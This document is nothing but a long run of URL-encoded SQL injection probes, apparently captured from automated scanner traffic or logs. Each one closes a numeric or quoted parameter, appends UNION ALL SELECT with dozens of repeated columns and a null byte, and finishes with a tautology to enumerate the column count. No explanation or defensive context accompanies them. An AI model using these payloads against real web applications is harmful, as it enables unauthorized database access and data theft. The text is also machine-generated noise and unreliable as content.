-7284%29%29%20UNION%20ALL%20SELECT%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%2C%201002%00%20AND%20%28%288390%3D8390 -6870%29%29%20UNION%20ALL%20SELECT%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%2C%202226%00%20AND%20%28%281190%3D1190 -8686%29%29%29%20UNION%20ALL%20SELECT%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%2C%207490%00%20AND%20%28%28%289578%3D9578 -9106%29%29%29%20UNION%20ALL%20SELECT%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%2C%204804%00%20AND%20%28%28%283784%3D3784 -9520%29%29%29%20UNION%20ALL%20SELECT%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%2C%203190%00%20AND%20%28%28%289987%3D9987 -6058%29%29%29%20UNION%20ALL%20SELECT%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%2C%205100%00%20AND%20%28%28%281306%3D1306 -4551%29%29%29%20UNION%20ALL%20SELECT%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%2C%208675%00%20AND%20%28%28%281225%3D1225 -8895%29%29%29%20UNION%20ALL%20SELECT%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%2C%202452%00%20AND%20%28%28%282258%3D2258 -1042%29%29%29%20UNION%20ALL%20SELECT%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%2C%201073%00%20AND%20%28%28%289007%3D9007 -7665%29%29%29%20UNION%20ALL%20SELECT%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%2C%209782%00%20AND%20%28%28%283129%3D3129 -7887%29%29%29%20UNION%20ALL%20SELECT%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%00%20AND%20%28%28%282110%3D2110 -3372%29%29%29%20UNION%20ALL%20SELECT%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%2C%204982%00%20AND%20%28%28%287489%3D7489 -6862%20UNION%20ALL%20SELECT%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%2C%205679%00 -3159%20UNION%20ALL%20SELECT%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%2C%201415%00 -1435%20UNION%20ALL%20SELECT%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%2C%201532%00 -9432%20UNION%20ALL%20SELECT%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%2C%202538%00 -3559%20UNION%20ALL%20SELECT%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%2C%205974%00 -5715%20UNION%20ALL%20SELECT%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%00 -9189%20UNION%20ALL%20SELECT%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%2C%201716%00 -2379%20UNION%20ALL%20SELECT%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%2C%208423%00 -6055%20UNION%20ALL%20SELECT%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%2C%206617%00 -1592%20UNION%20ALL%20SELECT%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%2C%203361%00 -9515%27%29%20UNION%20ALL%20SELECT%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%00%20AND%20%28%27oXCp%27%3D%27oXCp -2831%27%29%20UNION%20ALL%20SELECT%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%2C%208369%00%20AND%20%28%27CeOw%27%3D%27CeOw -1116%27%29%20UNION%20ALL%20SELECT%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%2C%204254%00%20AND%20%28%27dLnQ%27%3D%27dLnQ -4482%27%29%20UNION%20ALL%20SELECT%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%00%20AND%20%28%27iBNG%27%3D%27iBNG -5963%27%29%20UNION%20ALL%20SELECT%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%2C%208737%00%20AND%20%28%27doVW%27%3D%27doVW -5840%27%29%20UNION%20ALL%20SELECT%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%2C%206891%00%20AND%20%28%27ImZd%27%3D%27ImZd -5461%27%29%20UNION%20ALL%20SELECT%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%2C%206502%00%20AND%20%28%27DzxW%27%3D%27DzxW -4900%27%29%20UNION%20ALL%20SELECT%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%2C%202230%00%20AND%20%28%27Iguj%27%3D%27Iguj -9227%27%29%20UNION%20ALL%20SELECT%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%2C%207972%00%20AND%20%28%27gfVQ%27%3D%27gfVQ -5242%27%29%20UNION%20ALL%20SELECT%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%00%20AND%20%28%27XdHf%27%3D%27XdHf -5083%27%29%29%20UNION%20ALL%20SELECT%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%2C%202381%00%20AND%20%28%28%27eMjR%27%3D%27eMjR -6864%27%29%29%20UNION%20ALL%20SELECT%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%2C%208372%00%20AND%20%28%28%27LqKG%27%3D%27LqKG -5715%27%29%29%20UNION%20ALL%20SELECT%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%2C%205855%00%20AND%20%28%28%27Vauh%27%3D%27Vauh -3234%27%29%29%20UNION%20ALL%20SELECT%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%2C%209868%00%20AND%20%28%28%27VGuf%27%3D%27VGuf -3254%27%29%29%20UNION%20ALL%20SELECT%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%2C%203643%00%20AND%20%28%28%27ObSB%27%3D%27ObSB -2743%27%29%29%20UNION%20ALL%20SELECT%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%2C%209650%00%20AND%20%28%28%27dyWc%27%3D%27dyWc -1636%27%29%29%20UNION%20ALL%20SELECT%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%2C%207451%00%20AND%20%28%28%27ynzK%27%3D%27ynzK -3674%27%29%29%20UNION%20ALL%20SELECT%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%00%20AND%20%28%28%27HCLW%27%3D%27HCLW -4494%27%29%29%20UNION%20ALL%20SELECT%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%00%20AND%20%28%28%27gQCP%27%3D%27gQCP -1971%27%29%29%20UNION%20ALL%20SELECT%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%00%20AND%20%28%28%27gBMT%27%3D%27gBMT -7831%27%29%29%29%20UNION%20ALL%20SELECT%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%00%20AND%20%28%28%28%27wWgz%27%3D%27wWgz -4625%27%29%29%29%20UNION%20ALL%20SELECT%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%00%20AND%20%28%28%28%27wvuL%27%3D%27wvuL -2143%27%29%29%29%20UNION%20ALL%20SELECT%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%2C%204618%00%20AND%20%28%28%28%27dloS%27%3D%27dloS -3549%27%29%29%29%20UNION%20ALL%20SELECT%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%00%20AND%20%28%28%28%27oMRZ%27%3D%27oMRZ -6621%27%29%29%29%20UNION%20ALL%20SELECT%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%00%20AND%20%28%28%28%27pMrw%27%3D%27pMrw 